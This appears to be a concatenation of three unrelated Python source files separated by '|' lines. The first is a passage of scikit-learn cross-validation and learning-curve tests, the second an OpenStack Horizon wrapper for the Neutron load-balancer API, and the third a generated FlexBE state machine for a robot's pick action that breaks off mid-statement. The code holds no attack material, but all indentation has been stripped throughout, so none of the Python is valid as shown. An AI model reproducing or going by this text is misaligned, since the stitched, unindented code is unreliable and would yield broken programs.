score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_greater(score, 0.9)
assert_almost_equal(pvalue, 0.0, 1)
score_label, _, pvalue_label = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy",
labels=np.ones(y.size), random_state=0)
assert_true(score_label == score)
assert_true(pvalue_label == pvalue)
# check that we obtain the same results with a sparse representation
svm_sparse = SVC(kernel='linear')
cv_sparse = StratifiedKFold(2)
score_label, _, pvalue_label = permutation_test_score(
svm_sparse, X_sparse, y, n_permutations=30, cv=cv_sparse,
scoring="accuracy", labels=np.ones(y.size), random_state=0)
assert_true(score_label == score)
assert_true(pvalue_label == pvalue)
# test with custom scoring object
def custom_score(y_true, y_pred):
return (((y_true == y_pred).sum() - (y_true != y_pred).sum()) /
y_true.shape[0])
scorer = make_scorer(custom_score)
score, _, pvalue = permutation_test_score(
svm, X, y, n_permutations=100, scoring=scorer, cv=cv, random_state=0)
assert_almost_equal(score, .93, 2)
assert_almost_equal(pvalue, 0.01, 3)
# set random y
y = np.mod(np.arange(len(y)), 3)
score, scores, pvalue = permutation_test_score(
svm, X, y, n_permutations=30, cv=cv, scoring="accuracy")
assert_less(score, 0.5)
assert_greater(pvalue, 0.2)
def test_permutation_test_score_allow_nans():
# Check that permutation_test_score allows input data with NaNs
X = np.arange(200, dtype=np.float64).reshape(10, -1)
X[2, :] = np.nan
y = np.repeat([0, 1], X.shape[0] / 2)
p = Pipeline([
('imputer', Imputer(strategy='mean', missing_values='NaN')),
('classifier', MockClassifier()),
])
permutation_test_score(p, X, y, cv=5)
def test_cross_val_score_allow_nans():
# Check that cross_val_score allows input data with NaNs
X = np.arange(200, dtype=np.float64).reshape(10, -1)
X[2, :] = np.nan
y = np.repeat([0, 1], X.shape[0] / 2)
p = Pipeline([
('imputer', Imputer(strategy='mean', missing_values='NaN')),
('classifier', MockClassifier()),
])
cross_val_score(p, X, y, cv=5)
def test_cross_val_score_multilabel():
X = np.array([[-3, 4], [2, 4], [3, 3], [0, 2], [-3, 1],
[-2, 1], [0, 0], [-2, -1], [-1, -2], [1, -2]])
y = np.array([[1, 1], [0, 1], [0, 1], [0, 1], [1, 1],
[0, 1], [1, 0], [1, 1], [1, 0], [0, 0]])
clf = KNeighborsClassifier(n_neighbors=1)
scoring_micro = make_scorer(precision_score, average='micro')
scoring_macro = make_scorer(precision_score, average='macro')
scoring_samples = make_scorer(precision_score, average='samples')
score_micro = cross_val_score(clf, X, y, scoring=scoring_micro, cv=5)
score_macro = cross_val_score(clf, X, y, scoring=scoring_macro, cv=5)
score_samples = cross_val_score(clf, X, y, scoring=scoring_samples, cv=5)
assert_almost_equal(score_micro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 3])
assert_almost_equal(score_macro, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
assert_almost_equal(score_samples, [1, 1 / 2, 3 / 4, 1 / 2, 1 / 4])
def test_cross_val_predict():
boston = load_boston()
X, y = boston.data, boston.target
cv = KFold()
est = Ridge()
# Naive loop (should be same as cross_val_predict):
preds2 = np.zeros_like(y)
for train, test in cv.split(X, y):
est.fit(X[train], y[train])
preds2[test] = est.predict(X[test])
preds = cross_val_predict(est, X, y, cv=cv)
assert_array_almost_equal(preds, preds2)
preds = cross_val_predict(est, X, y)
assert_equal(len(preds), len(y))
cv = LeaveOneOut()
preds = cross_val_predict(est, X, y, cv=cv)
assert_equal(len(preds), len(y))
Xsp = X.copy()
Xsp *= (Xsp > np.median(Xsp))
Xsp = coo_matrix(Xsp)
preds = cross_val_predict(est, Xsp, y)
assert_array_almost_equal(len(preds), len(y))
preds = cross_val_predict(KMeans(), X)
assert_equal(len(preds), len(y))
class BadCV():
def split(self, X, y=None, labels=None):
for i in range(4):
yield np.array([0, 1, 2, 3]), np.array([4, 5, 6, 7, 8])
assert_raises(ValueError, cross_val_predict, est, X, y, cv=BadCV())
def test_cross_val_predict_input_types():
iris = load_iris()
X, y = iris.data, iris.target
X_sparse = coo_matrix(X)
multioutput_y = np.column_stack([y, y[::-1]])
clf = Ridge(fit_intercept=False, random_state=0)
# 3 fold cv is used --> atleast 3 samples per class
# Smoke test
predictions = cross_val_predict(clf, X, y)
assert_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_equal(predictions.shape, (150, 2))
predictions = cross_val_predict(clf, X_sparse, y)
assert_array_equal(predictions.shape, (150,))
# test with multioutput y
predictions = cross_val_predict(clf, X_sparse, multioutput_y)
assert_array_equal(predictions.shape, (150, 2))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
predictions = cross_val_predict(clf, X.tolist(), y.tolist())
clf = CheckingClassifier(check_y=list_check)
predictions = cross_val_predict(clf, X, y.tolist())
# test with 3d X and
X_3d = X[:, :, np.newaxis]
check_3d = lambda x: x.ndim == 3
clf = CheckingClassifier(check_X=check_3d)
predictions = cross_val_predict(clf, X_3d, y)
assert_array_equal(predictions.shape, (150,))
def test_cross_val_predict_pandas():
# check cross_val_score doesn't destroy pandas dataframe
types = [(MockDataFrame, MockDataFrame)]
try:
from pandas import Series, DataFrame
types.append((Series, DataFrame))
except ImportError:
pass
for TargetType, InputFeatureType in types:
# X dataframe, y series
X_df, y_ser = InputFeatureType(X), TargetType(y2)
check_df = lambda x: isinstance(x, InputFeatureType)
check_series = lambda x: isinstance(x, TargetType)
clf = CheckingClassifier(check_X=check_df, check_y=check_series)
cross_val_predict(clf, X_df, y_ser)
def test_cross_val_score_sparse_fit_params():
iris = load_iris()
X, y = iris.data, iris.target
clf = MockClassifier()
fit_params = {'sparse_sample_weight': coo_matrix(np.eye(X.shape[0]))}
a = cross_val_score(clf, X, y, fit_params=fit_params)
assert_array_equal(a, np.ones(3))
def test_learning_curve():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
with warnings.catch_warnings(record=True) as w:
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=3, train_sizes=np.linspace(0.1, 1.0, 10))
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_equal(train_scores.shape, (10, 3))
assert_equal(test_scores.shape, (10, 3))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_verbose():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
train_sizes, train_scores, test_scores = \
learning_curve(estimator, X, y, cv=3, verbose=1)
finally:
out = sys.stdout.getvalue()
sys.stdout.close()
sys.stdout = old_stdout
assert("[learning_curve]" in out)
def test_learning_curve_incremental_learning_not_possible():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
# The mockup does not have partial_fit()
estimator = MockImprovingEstimator(1)
assert_raises(ValueError, learning_curve, estimator, X, y,
exploit_incremental_learning=True)
def test_learning_curve_incremental_learning():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_incremental_learning_unsupervised():
X, _ = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockIncrementalImprovingEstimator(20)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y=None, cv=3, exploit_incremental_learning=True,
train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_learning_curve_batch_and_incremental_learning_are_equal():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
train_sizes = np.linspace(0.2, 1.0, 5)
estimator = PassiveAggressiveClassifier(n_iter=1, shuffle=False)
train_sizes_inc, train_scores_inc, test_scores_inc = \
learning_curve(
estimator, X, y, train_sizes=train_sizes,
cv=3, exploit_incremental_learning=True)
train_sizes_batch, train_scores_batch, test_scores_batch = \
learning_curve(
estimator, X, y, cv=3, train_sizes=train_sizes,
exploit_incremental_learning=False)
assert_array_equal(train_sizes_inc, train_sizes_batch)
assert_array_almost_equal(train_scores_inc.mean(axis=1),
train_scores_batch.mean(axis=1))
assert_array_almost_equal(test_scores_inc.mean(axis=1),
test_scores_batch.mean(axis=1))
def test_learning_curve_n_sample_range_out_of_bounds():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.0, 1.0])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0.1, 1.1])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[0, 20])
assert_raises(ValueError, learning_curve, estimator, X, y, cv=3,
train_sizes=[1, 21])
def test_learning_curve_remove_duplicate_sample_sizes():
X, y = make_classification(n_samples=3, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(2)
train_sizes, _, _ = assert_warns(
RuntimeWarning, learning_curve, estimator, X, y, cv=3,
train_sizes=np.linspace(0.33, 1.0, 3))
assert_array_equal(train_sizes, [1, 2])
def test_learning_curve_with_boolean_indices():
X, y = make_classification(n_samples=30, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
estimator = MockImprovingEstimator(20)
cv = KFold(n_splits=3)
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, train_sizes=np.linspace(0.1, 1.0, 10))
assert_array_equal(train_sizes, np.linspace(2, 20, 10))
assert_array_almost_equal(train_scores.mean(axis=1),
np.linspace(1.9, 1.0, 10))
assert_array_almost_equal(test_scores.mean(axis=1),
np.linspace(0.1, 1.0, 10))
def test_validation_curve():
X, y = make_classification(n_samples=2, n_features=1, n_informative=1,
n_redundant=0, n_classes=2,
n_clusters_per_class=1, random_state=0)
param_range = np.linspace(0, 1, 10)
with warnings.catch_warnings(record=True) as w:
train_scores, test_scores = validation_curve(
MockEstimatorWithParameter(), X, y, param_name="param",
param_range=param_range, cv=2
)
if len(w) > 0:
raise RuntimeError("Unexpected warning: %r" % w[0].message)
assert_array_almost_equal(train_scores.mean(axis=1), param_range)
assert_array_almost_equal(test_scores.mean(axis=1), 1 - param_range)
def test_check_is_permutation():
p = np.arange(100)
assert_true(_check_is_permutation(p, 100))
assert_false(_check_is_permutation(np.delete(p, 23), 100))
p[0] = 23
assert_false(_check_is_permutation(p, 100))
def test_cross_val_predict_sparse_prediction():
# check that cross_val_predict gives same result for sparse and dense input
X, y = make_multilabel_classification(n_classes=2, n_labels=1,
allow_unlabeled=False,
return_indicator=True,
random_state=1)
X_sparse = csr_matrix(X)
y_sparse = csr_matrix(y)
classif = OneVsRestClassifier(SVC(kernel='linear'))
preds = cross_val_predict(classif, X, y, cv=10)
preds_sparse = cross_val_predict(classif, X_sparse, y_sparse, cv=10)
preds_sparse = preds_sparse.toarray()
assert_array_almost_equal(preds_sparse, preds)
def test_cross_val_predict_with_method():
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=0)
classes = len(set(y))
kfold = KFold(len(iris.target))
methods = ['decision_function', 'predict_proba', 'predict_log_proba']
for method in methods:
est = LogisticRegression()
predictions = cross_val_predict(est, X, y, method=method)
assert_equal(len(predictions), len(y))
expected_predictions = np.zeros([len(y), classes])
func = getattr(est, method)
# Naive loop (should be same as cross_val_predict):
for train, test in kfold.split(X, y):
est.fit(X[train], y[train])
expected_predictions[test] = func(X[test])
predictions = cross_val_predict(est, X, y, method=method,
cv=kfold)
assert_array_almost_equal(expected_predictions, predictions)
def test_score_memmap():
# Ensure a scalar score of memmap type is accepted
iris = load_iris()
X, y = iris.data, iris.target
clf = MockClassifier()
tf = tempfile.NamedTemporaryFile(mode='wb', delete=False)
tf.write(b'Hello world!!!!!')
tf.close()
scores = np.memmap(tf.name, dtype=np.float64)
score = np.memmap(tf.name, shape=(), mode='r', dtype=np.float64)
try:
cross_val_score(clf, X, y, scoring=lambda est, X, y: score)
# non-scalar should still fail
assert_raises(ValueError, cross_val_score, clf, X, y,
scoring=lambda est, X, y: scores)
finally:
# Best effort to release the mmap file handles before deleting the
# backing file under Windows
scores, score = None, None
for _ in range(3):
try:
os.unlink(tf.name)
break
except WindowsError:
sleep(1.)
|
|
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from django.utils.datastructures import SortedDict
from django.utils.translation import ugettext_lazy as _
from horizon import messages
from openstack_dashboard.api import neutron
neutronclient = neutron.neutronclient
class Vip(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer vip."""
def __init__(self, apiresource):
super(Vip, self).__init__(apiresource)
class Pool(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer pool."""
def __init__(self, apiresource):
if 'provider' not in apiresource:
apiresource['provider'] = None
super(Pool, self).__init__(apiresource)
class Member(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer member."""
def __init__(self, apiresource):
super(Member, self).__init__(apiresource)
class PoolStats(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer pool stats."""
def __init__(self, apiresource):
super(PoolStats, self).__init__(apiresource)
class PoolMonitor(neutron.NeutronAPIDictWrapper):
"""Wrapper for neutron load balancer pool health monitor."""
def __init__(self, apiresource):
super(PoolMonitor, self).__init__(apiresource)
def vip_create(request, **kwargs):
"""Create a vip for a specified pool.
:param request: request context
:param address: virtual IP address
:param name: name for vip
:param description: description for vip
:param subnet_id: subnet_id for subnet of vip
:param protocol_port: transport layer port number for vip
:returns: Vip object
"""
body = {'vip': {'name': kwargs['name'],
'description': kwargs['description'],
'subnet_id': kwargs['subnet_id'],
'protocol_port': kwargs['protocol_port'],
'protocol': kwargs['protocol'],
'pool_id': kwargs['pool_id'],
'session_persistence': kwargs['session_persistence'],
'admin_state_up': kwargs['admin_state_up']
}}
if kwargs.get('connection_limit'):
body['vip']['connection_limit'] = kwargs['connection_limit']
if kwargs.get('address'):
body['vip']['address'] = kwargs['address']
vip = neutronclient(request).create_vip(body).get('vip')
return Vip(vip)
def vip_list(request, **kwargs):
vips = neutronclient(request).list_vips(**kwargs).get('vips')
return [Vip(v) for v in vips]
def vip_get(request, vip_id):
return _vip_get(request, vip_id, expand_resource=True)
def _vip_get(request, vip_id, expand_resource=False):
vip = neutronclient(request).show_vip(vip_id).get('vip')
if expand_resource:
vip['subnet'] = neutron.subnet_get(request, vip['subnet_id'])
vip['port'] = neutron.port_get(request, vip['port_id'])
vip['pool'] = _pool_get(request, vip['pool_id'])
return Vip(vip)
def vip_update(request, vip_id, **kwargs):
vip = neutronclient(request).update_vip(vip_id, kwargs).get('vip')
return Vip(vip)
def vip_delete(request, vip_id):
neutronclient(request).delete_vip(vip_id)
def pool_create(request, **kwargs):
"""Create a pool for specified protocol
:param request: request context
:param name: name for pool
:param description: description for pool
:param subnet_id: subnet_id for subnet of pool
:param protocol: load balanced protocol
:param lb_method: load balancer method
:param admin_state_up: admin state (default on)
"""
body = {'pool': {'name': kwargs['name'],
'description': kwargs['description'],
'subnet_id': kwargs['subnet_id'],
'protocol': kwargs['protocol'],
'lb_method': kwargs['lb_method'],
'admin_state_up': kwargs['admin_state_up'],
'provider': kwargs['provider'],
}}
pool = neutronclient(request).create_pool(body).get('pool')
return Pool(pool)
def _get_vip(request, pool, vip_dict, expand_name_only=False):
if pool['vip_id'] is not None:
try:
if vip_dict:
vip = vip_dict.get(pool['vip_id'])
else:
vip = _vip_get(request, pool['vip_id'])
except Exception:
messages.warning(request, _("Unable to get VIP for pool "
"%(pool)s.") % {"pool": pool["id"]})
vip = Vip({'id': pool['vip_id'], 'name': ''})
if expand_name_only:
vip = vip.name_or_id
return vip
else:
return None
def pool_list(request, **kwargs):
return _pool_list(request, expand_subnet=True, expand_vip=True, **kwargs)
def _pool_list(request, expand_subnet=False, expand_vip=False, **kwargs):
pools = neutronclient(request).list_pools(**kwargs).get('pools')
if expand_subnet:
subnets = neutron.subnet_list(request)
subnet_dict = SortedDict((s.id, s) for s in subnets)
for p in pools:
subnet = subnet_dict.get(p['subnet_id'])
p['subnet_name'] = subnet.cidr if subnet else None
if expand_vip:
vips = vip_list(request)
vip_dict = SortedDict((v.id, v) for v in vips)
for p in pools:
p['vip_name'] = _get_vip(request, p, vip_dict,
expand_name_only=True)
return [Pool(p) for p in pools]
def pool_get(request, pool_id):
return _pool_get(request, pool_id, expand_resource=True)
def _pool_get(request, pool_id, expand_resource=False):
try:
pool = neutronclient(request).show_pool(pool_id).get('pool')
except Exception:
messages.warning(request, _("Unable to get pool detail."))
return None
if expand_resource:
# TODO(lyj): The expand resource(subnet, member etc.) attached
# to a pool could be deleted without cleanup pool related database,
# this will cause exceptions if we trying to get the deleted resources.
# so we need to handle the situation by showing a warning message here.
# we can safely remove the try/except once the neutron bug is fixed
# https://bugs.launchpad.net/neutron/+bug/1406854
try:
pool['subnet'] = neutron.subnet_get(request, pool['subnet_id'])
except Exception:
messages.warning(request, _("Unable to get subnet for pool "
"%(pool)s.") % {"pool": pool_id})
pool['vip'] = _get_vip(request, pool, vip_dict=None,
expand_name_only=False)
try:
pool['members'] = _member_list(request, expand_pool=False,
pool_id=pool_id)
except Exception:
messages.warning(request, _("Unable to get members for pool "
"%(pool)s.") % {"pool": pool_id})
monitors = []
for monitor_id in pool['health_monitors']:
try:
monitors.append(_pool_health_monitor_get(request, monitor_id,
False))
except Exception:
messages.warning(request,
_("Unable to get health monitor "
"%(monitor_id)s for pool %(pool)s.")
% {"pool": pool_id,
"monitor_id": monitor_id})
pool['health_monitors'] = monitors
return Pool(pool)
def pool_update(request, pool_id, **kwargs):
pool = neutronclient(request).update_pool(pool_id, kwargs).get('pool')
return Pool(pool)
def pool_delete(request, pool):
neutronclient(request).delete_pool(pool)
# not linked to UI yet
def pool_stats(request, pool_id, **kwargs):
stats = neutronclient(request).retrieve_pool_stats(pool_id, **kwargs)
return PoolStats(stats)
def pool_health_monitor_create(request, **kwargs):
"""Create a health monitor
:param request: request context
:param type: type of monitor
:param delay: delay of monitor
:param timeout: timeout of monitor
:param max_retries: max retries [1..10]
:param http_method: http method
:param url_path: url path
:param expected_codes: http return code
:param admin_state_up: admin state
"""
monitor_type = kwargs['type'].upper()
body = {'health_monitor': {'type': monitor_type,
'delay': kwargs['delay'],
'timeout': kwargs['timeout'],
'max_retries': kwargs['max_retries'],
'admin_state_up': kwargs['admin_state_up']
}}
if monitor_type in ['HTTP', 'HTTPS']:
body['health_monitor']['http_method'] = kwargs['http_method']
body['health_monitor']['url_path'] = kwargs['url_path']
body['health_monitor']['expected_codes'] = kwargs['expected_codes']
mon = neutronclient(request).create_health_monitor(body).get(
'health_monitor')
return PoolMonitor(mon)
def pool_health_monitor_list(request, **kwargs):
monitors = neutronclient(request).list_health_monitors(
**kwargs).get('health_monitors')
return [PoolMonitor(m) for m in monitors]
def pool_health_monitor_get(request, monitor_id):
return _pool_health_monitor_get(request, monitor_id, expand_resource=True)
def _pool_health_monitor_get(request, monitor_id, expand_resource=False):
monitor = neutronclient(request
).show_health_monitor(monitor_id
).get('health_monitor')
if expand_resource:
pool_ids = [p['pool_id'] for p in monitor['pools']]
monitor['pools'] = _pool_list(request, id=pool_ids)
return PoolMonitor(monitor)
def pool_health_monitor_update(request, monitor_id, **kwargs):
monitor = neutronclient(request
).update_health_monitor(monitor_id, kwargs
).get('health_monitor')
return PoolMonitor(monitor)
def pool_health_monitor_delete(request, mon_id):
neutronclient(request).delete_health_monitor(mon_id)
def member_create(request, **kwargs):
"""Create a load balance member
:param request: request context
:param pool_id: pool_id of pool for member
:param address: IP address
:param protocol_port: transport layer port number
:param weight: weight for member
:param admin_state_up: admin_state
"""
body = {'member': {'pool_id': kwargs['pool_id'],
'address': kwargs['address'],
'protocol_port': kwargs['protocol_port'],
'admin_state_up': kwargs['admin_state_up']
}}
if kwargs.get('weight'):
body['member']['weight'] = kwargs['weight']
member = neutronclient(request).create_member(body).get('member')
return Member(member)
def member_list(request, **kwargs):
return _member_list(request, expand_pool=True, **kwargs)
def _member_list(request, expand_pool, **kwargs):
members = neutronclient(request).list_members(**kwargs).get('members')
if expand_pool:
pools = _pool_list(request)
pool_dict = SortedDict((p.id, p) for p in pools)
for m in members:
m['pool_name'] = pool_dict.get(m['pool_id']).name_or_id
return [Member(m) for m in members]
def member_get(request, member_id):
return _member_get(request, member_id, expand_pool=True)
def _member_get(request, member_id, expand_pool):
member = neutronclient(request).show_member(member_id).get('member')
if expand_pool:
member['pool'] = _pool_get(request, member['pool_id'])
return Member(member)
def member_update(request, member_id, **kwargs):
member = neutronclient(request).update_member(member_id, kwargs
).get('member')
return Member(member)
def member_delete(request, mem_id):
neutronclient(request).delete_member(mem_id)
def pool_monitor_association_create(request, **kwargs):
"""Associate a health monitor with pool
:param request: request context
:param monitor_id: id of monitor
:param pool_id: id of pool
"""
body = {'health_monitor': {'id': kwargs['monitor_id'], }}
neutronclient(request).associate_health_monitor(
kwargs['pool_id'], body)
def pool_monitor_association_delete(request, **kwargs):
"""Disassociate a health monitor from pool
:param request: request context
:param monitor_id: id of monitor
:param pool_id: id of pool
"""
neutronclient(request).disassociate_health_monitor(
kwargs['pool_id'], kwargs['monitor_id'])
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sara_flexbe_states.GetRosParam import GetRosParam
from flexbe_states.check_condition_state import CheckConditionState
from sara_flexbe_states.sara_say import SaraSay
from sara_flexbe_behaviors.action_pick_sm import Action_pickSM
from sara_flexbe_states.SetKey import SetKey
from sara_flexbe_states.get_reachable_waypoint import Get_Reacheable_Waypoint
from flexbe_states.calculation_state import CalculationState
from sara_flexbe_states.sara_set_head_angle import SaraSetHeadAngle
from sara_flexbe_states.moveit_move import MoveitMove
from sara_flexbe_states.sara_move_base import SaraMoveBase
from flexbe_states.wait_state import WaitState
from sara_flexbe_states.for_loop import ForLoop
from sara_flexbe_states.SetRosParam import SetRosParam
from sara_flexbe_behaviors.action_find_sm import Action_findSM
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Tue Jul 11 2017
@author: Philippe La Madeleine
'''
class ActionWrapper_PickSM(Behavior):
'''
action wrapper pour pick
'''
def __init__(self):
super(ActionWrapper_PickSM, self).__init__()
self.name = 'ActionWrapper_Pick'
# parameters of this behavior
# references to used behaviors
self.add_behavior(Action_pickSM, 'Action_pick')
self.add_behavior(Action_findSM, 'Action_find')
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
# O 797 34
# Pick|n1- object
def create(self):
# x:660 y:509, x:880 y:203, x:715 y:440
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed', 'critical_fail'], input_keys=['Action'])
_state_machine.userdata.Action = ["Pick","bottle"]
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
# x:30 y:365, x:130 y:365, x:230 y:365, x:330 y:365
_sm_group_0 = ConcurrencyContainer(outcomes=['done'], input_keys=['pose_out'], conditions=[
('done', [('move', 'arrived')]),
('done', [('move', 'failed')]),
('done', [('3', 'done')])
])
with _sm_group_0:
# x:30 y:40
OperatableStateMachine.add('move',
SaraMoveBase(reference="map"),
transitions={'arrived': 'done', 'failed': 'done'},
autonomy={'arrived': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'pose': 'pose_out'})
# x:179 y:91
OperatableStateMachine.add('3',
WaitState(wait_time=2),
transitions={'done': 'done'},
autonomy={'done': Autonomy.Off})
# x:40 y:700
_sm_get_closer_1 = OperatableStateMachine(outcomes=['done'], input_keys=['Object'])
with _sm_get_closer_1:
# x:59 y:36
OperatableStateMachine.add('set targetpose',
SetKey(Value="PreGripPose"),
transitions={'done': 'say closer'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'target'})
# x:88 y:374
OperatableStateMachine.add('set dist',
SetKey(Value=0.8),
transitions={'done': 'get close pos'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'distance'})
# x:26 y:448
OperatableStateMachine.add('get close pos',
Get_Reacheable_Waypoint(),
transitions={'done': 'Group'},
autonomy={'done': Autonomy.Off},
remapping={'pose_in': 'Pos', 'distance': 'distance', 'pose_out': 'pose_out'})
# x:47 y:213
OperatableStateMachine.add('get pos',
CalculationState(calculation=lambda x: x.position),
transitions={'done': 'move head'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'Object', 'output_value': 'Pos'})
# x:88 y:290
OperatableStateMachine.add('move head',
SaraSetHeadAngle(pitch=0.7, yaw=0),
transitions={'done': 'set dist'},
autonomy={'done': Autonomy.Off})
# x:201 y:156
OperatableStateMachine.add('move arm',
MoveitMove(move=True, waitForExecution=True, group="RightArm", watchdog=15),
transitions={'done': 'get pos', 'failed': 'get pos'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'target': 'target'})
# x:60 y:106
OperatableStateMachine.add('say closer',
SaraSay(sentence="I need to get a bit closer.", input_keys=[], emotion=1, block=False),
transitions={'done': 'move arm'},
autonomy={'done': Autonomy.Off})
# x:26 y:541
OperatableStateMachine.add('Group',
_sm_group_0,
transitions={'done': 'wait'},
autonomy={'done': Autonomy.Inherit},
remapping={'pose_out': 'pose_out'})
# x:33 y:625
OperatableStateMachine.add('wait',
WaitState(wait_time=2),
transitions={'done': 'done'},
autonomy={'done': Autonomy.Off})
# x:59 y:308, x:447 y:59, x:384 y:162
_sm_check_form_2 = OperatableStateMachine(outcomes=['done', 'fail_full', 'full_no_object'], input_keys=['Action'])
with _sm_check_form_2:
# x:31 y:40
OperatableStateMachine.add('check if gripper full',
GetRosParam(ParamName="behavior/Gripper_Content"),
transitions={'done': 'Say_Full', 'failed': 'cond'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'Value': 'ObjectInGripper'})
# x:30 y:121
OperatableStateMachine.add('cond',
CheckConditionState(predicate=lambda x: x[1] == ''),
transitions={'true': 'not told', 'false': 'done'},
autonomy={'true': Autonomy.Off, 'false': Autonomy.Off},
remapping={'input_value': 'Action'})
# x:222 y:119
OperatableStateMachine.add('not told',
SaraSay(sentence="Hum! They didn't told me what to pick", input_keys=[], emotion=1, block=True),
transitions={'done': 'full_no_object'},
autonomy={'done': Autonomy.Off})
# x:242 y:31
OperatableStateMachine.add('Say_Full',
SaraSay(sentence=lambda x: "Wait. There is already a "+ x + "in my gripper.", input_keys=[], emotion=0, block=True),
transitions={'done': 'fail_full'},
autonomy={'done': Autonomy.Off})
with _state_machine:
# x:84 y:30
OperatableStateMachine.add('Check Form',
_sm_check_form_2,
transitions={'done': 'get name', 'fail_full': 'cause1', 'full_no_object': 'cause2'},
autonomy={'done': Autonomy.Inherit, 'fail_full': Autonomy.Inherit, 'full_no_object': Autonomy.Inherit},
remapping={'Action': 'Action'})
# x:28 y:452
OperatableStateMachine.add('Action_pick',
self.use_behavior(Action_pickSM, 'Action_pick'),
transitions={'success': 'Got_It', 'unreachable': 'for 1', 'not found': 'Say_lost', 'dropped': 'say missed'},
autonomy={'success': Autonomy.Inherit, 'unreachable': Autonomy.Inherit, 'not found': Autonomy.Inherit, 'dropped': Autonomy.Inherit},
